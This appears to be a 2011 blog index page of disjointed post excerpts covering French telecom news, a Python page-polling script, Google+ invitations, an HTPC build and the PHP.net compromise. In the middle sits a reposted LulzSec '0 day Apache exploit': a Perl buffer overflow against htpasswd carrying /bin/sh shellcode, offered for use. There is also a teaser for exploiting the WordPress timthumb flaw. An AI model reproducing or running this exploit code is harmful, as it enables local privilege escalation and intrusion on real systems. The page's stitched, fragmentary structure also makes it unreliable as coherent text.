Something new and completely unexpected happened to me last sunday night around 8pm (what totally fucked up the end of my weekend).
First I was alerted by Google Webmaster Tools (GWT) that my websites were not in good health, just as it’s shown in this screenshot I found on Google images:
As some of you may know, today should be the official launch date for the Free Mobile GSM carrier in France. Why is it interesting?
Because Free.fr was always a synonym of evolution.
They were the first to sell 50 hours of dial up internet connectivity for 30€ a month when everybody else was selling 10 hours for 50€.
They were the first to sell unlimited 512k DSL internet access for 30€ when everybody else was selling it for at least twice more.
They were the first to promote ADSL2+, increasing the average customer bandwidth by a factor of at least 5.
They announced a new revolution for today: follow the announcement live with us!
Hi,
Free.fr is playing with us on http://live.free.fr: they added a MD5 checksum on the side of the space shuffle.
It seems that the checksum value changed twice already, so I built a little script that will fetch the page in an infinite loop looking for a new value.
#!/usr/bin/python
from httplib2 import Http
from re import compile
from time import sleep
URL = "http://live.free.fr"
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011-10-16 20:23:00"
REGEX = "^[\s]*.*([0-9a-f])[|\\\\].*$"
def fetch():
h = Http()
response, content = h.request(URL, headers = { 'User-Agent' : USER_AGENT })
return content
def parse(content, regex):
lines = content.split('\n')
ret = ""
for line in lines:
occurences = regex.findall(line)
ret += "".join(occurences)
return ret
if __name__ == "__main__":
latest_hash = ""
regex = compile(REGEX)
while 1:
current_page = fetch()
current_hash = parse(current_page, regex)
if (current_hash != "") and (current_hash != latest_hash):
print "New hash value!"
print current_hash
latest_hash = current_hash
sleep(60)
Was crawling on the Internet for the last day of 2011 and i saw someone trying to hack a wordpress website using the timthumb exploit.
Maybe you about it, maybe you don’t. Anyway, i’ll show you how to exploit the vuln
For of all you should find a wordpress using any theme having the timthumb.php Read the rest of this entry
Just like we did for Quora (http://www.devquotes.com/2011/01/06/providing-quora-com-invitations/), we will provide any invitations needed for those who totally want to try this already famous Google+ :)
Just follow the steps:
Today the famous group just released one of the many 0day they’re using :
You got here the code :)
RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
. /$$ /$$ /$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!
.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==y'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""bno,
. o O (_) (_) \ / _ AWAW/
. / _(+)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" === d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-""-.~~~~~~ .-""-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ V/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-""-.
. .-""-.___` -- \| -.__..-
Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!
===========================================
#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
It is with these words that the Swedish Minister for the environment, Andreas Calgren, concluded this staged trial of humankind which was held in Stockholm on May 17, 2011 on the sidelines of the Nobel Prize’s third symposium for sustainable development. Twenty renowned scientists have been presented with this prestigious award.
This is the third article about my journey building a HTPC server. If you didn’t follow the whole serie, they are available here: basic & hardware considerations.
I finally received all the hardware required to build my server. I only bought the base: a motherboard which includes CPU plus graphic card (AT5IONT-I), memory (1x1GB + 1x2GB), a case (Lian-Li PC-V354R), and a Blu-Ray reader. I re-used a Antec EarthWatt 500W power supply unit and a old 500G hard drive I had in some server laying at my place.
The news, coming initially from VUPEN from what I can see, is spreading that PHP.NET has been hacked. PHP sources released on the website seems to have been backdoored, or at least modified.
Last posts